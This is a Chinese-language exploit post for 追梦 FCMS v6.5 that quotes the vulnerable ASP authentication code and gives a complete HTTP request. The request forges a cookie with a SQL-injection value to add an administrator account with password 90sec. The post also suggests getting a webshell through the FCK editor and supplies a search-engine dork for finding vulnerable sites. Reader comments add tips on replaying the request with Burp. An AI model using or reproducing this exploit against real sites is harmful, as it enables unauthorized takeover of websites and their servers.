追梦Flash网站管理系统FCMS v6.5 漏洞

Author:roker
xmlEditor/adminadd.asp
[php]



<%
if request.cookies("key")<>"super" then
response.Write("

")
Response.End
end if
%>
chkuser.asp
<%
set urs=server.createobject("adodb.recordset")
sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
urs.close
set urs=nothing
%>[/php]
提交
[php]
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://xxx/xmlEditor/adminadd.asp
Cookie: key=super;adminName='%09or '1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com[/php]
添加账号密码为90sec的用户 = =
后台 fck编辑器 拿shell
关键字。。
inurl:"server.asp?flowNo="

6 条评论

  1. 小菜鸟

    请问一下,如何提交呢?

    1. 0day5
      @小菜鸟

      可以使用万能的burp神奇抓包提交,也可以使用httplive来抓包去提交。二楼你怎么看

      1. 小二
        @0day5

        提交能讲的具体一点吗?弄了半天没有弄懂。 :?:

        1. 0day5
          @小二

          抓包提交上去
          adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com

      2. 小菜鸟
        @0day5

        谢谢老师!

        1. 0day5
          @小菜鸟

          唔~大家都是菜鸟,一起进步

发表评论